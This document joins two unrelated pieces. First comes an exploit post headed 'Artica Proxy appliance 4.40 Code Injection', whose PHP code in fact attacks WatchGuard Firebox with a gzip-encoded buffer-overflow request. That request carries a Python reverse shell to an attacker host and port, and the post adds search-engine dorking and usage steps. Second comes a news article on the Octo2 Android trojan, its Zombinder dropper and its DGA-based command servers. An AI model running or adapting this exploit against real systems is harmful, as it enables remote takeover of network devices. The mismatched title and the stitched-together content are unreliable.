    =============================================================================================================================================| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://artica-proxy.com/                                                                                                   |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit {    private $targetUri;    private $lhost;    private $lport;    private $shell;    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {        $this->targetUri = $targetUri;        $this->lhost = $lhost;        $this->lport = $lport;        $this->shell = $shell;    }    public function sendRequest($method, $url, $data = null, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function checkWatchGuardFirebox() {        $url = $this->targetUri . '/auth/login';        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);                if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false             && strpos($response, 'Firebox') !== false) {            return true;        }        return false;    }    public function createBofPayload() {        // Generate the buffer overflow payload with Python reverse shell code        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric        $pyFilename = "/tmp/" . $randomStr . ".py";        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";        $payload .= str_repeat('<BBBBMFA>', 3680);        // Include a Python reverse shell command as the payload        $payload .= 'import socket;from subprocess import call; from os import dup2;';        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';        $payload .= 'call(["' . $this->shell . '","-i"]);';        $payload .= 'import os; os.remove("' . $pyFilename . '");';        return gzencode($payload); // gzip encoding    }    public function exploit() {        if (!$this->checkWatchGuardFirebox()) {            echo "Target is not vulnerable.\n";            return;        }        echo "Target is vulnerable. Sending exploit...\n";        $bofPayload = $this->createBofPayload();        // Send the buffer overflow payload        $url = $this->targetUri . '/agent/login';        $this->sendRequest('POST', $url, $bofPayload, [            'Accept-Encoding: gzip, deflate',            'Content-Encoding: gzip'        ]);        echo "Payload sent.\n";    }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Artica Proxy 4.40 Code Injection

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This…

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This advanced trojan uses sophisticated techniques to evade detection, steal credentials, and enable remote access to infected devices.

Cybersecurity researchers at DomainTools have released their new research on Octo2, a new version of the notorious Octo malware family. Octo2 targets Android mobile devices and based on its activity, researchers believe that it will target users globally soon.

According to Steve Behm, Solutions Engineer at DomainTools, Octo2 represents a major change in cybersecurity threats. This updated version of the prolific Octo (ExobotCompact) family spreads rapidly due to its enhanced features, global adoption of its predecessor, and aggressive distribution tactics. 

Octo2 features improved remote access trojan capabilities, ensuring reliable communication and control over infected devices even in challenging network conditions. Moreover, its enhanced Anti-Analysis and Anti-Detection techniques can hinder security analysis and detection, making it more difficult to identify and neutralize the threat.

In addition, the use of DGA-Based C2 server generation algorithm (DGA) to create dynamic command and control (C2) server addresses adds a layer of complexity, making it harder for security systems to track and disrupt communication.

“We were eventually able to expand the original 9 domains and 7 TLDs to 269 domains and 12 TLDs first seen from August 22nd, 2024 to October 4th, 2024,” reads DomainTool’s **blog post** shared with Hackread.com ahead of publishing on October 10, 2024.

****Currently Targeting Europe****

Early samples of Octo2 have been observed in several European countries, including Italy, Poland, Moldova, and Hungary. However, given the global reach of the original Octo and the improvements in Octo2, its distribution is expected to expand rapidly. 

****Attack Pattern** – Disguised as VPN and Browser**

The malware often disguises itself as legitimate applications, such as Google Chrome, NordVPN, or “Enterprise Europe Network,” to deceive unsuspecting users. It employs a dropper called **Zombinder** to deliver the malicious payload, prompting users to install a seemingly harmless plugin that is actually Octo2.   

For your information, Zombinder is another Android malware that was actively sold on the dark web in 2022. Its developers also offered a Windows version. At that time, Zombinder was found distributing the notorious **Xenomorph banking malware**, disguised as the VidMate app.

Once a device gets infected, Octo2 allows remote access to mobile devices, intercepting push notifications, harvesting credentials, and performing unauthorized actions, such as allowing for unauthorized login and access. The **Conficker worm discovered in 2008** is one of the earliest examples of a DGA used by malware families and so far 50 malware families, including Zeus and Dyre, have been identified to be using DGA domains.

****Abusing Domain Generation Algorithms****

Octo2’s use of a DGA (Domain Generation Algorithms – Different from **Registered Domain Generation Algorithms – RDGAs**) to generate its C2 server address is a significant enhancement. This technique allows the malware to constantly change its communication endpoints, making it more resilient to takedowns and detection efforts. While researchers can identify the patterns used to generate these domains, the dynamic nature of the C2 infrastructure presents a massive threat.  

Domain Tools researchers warn users to be cautious of Octo2 malware and avoid downloading apps or software from third-party sites. For businesses, using **threat intelligence** is important. This includes advanced detection tools like sandboxing, monitoring DNS traffic for unusual activity, and using endpoint security solutions to spot malicious behaviour on infected devices. Regular DNS traffic monitoring can also help detect DGA-based malware.

1.  **Android Malware Ajina.Banker Steals 2FA Codesvia Telegram**
2.  **BingoMod Android Malware Posing as Security Apps, Wipes Data**
3.  **SMS Stealer Targeting Android Users via Malicious Apps and Ads**
4.  **Phishing Attacks Target European Bank Users on iOS and Android**
5.  **Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos**

Tag

#google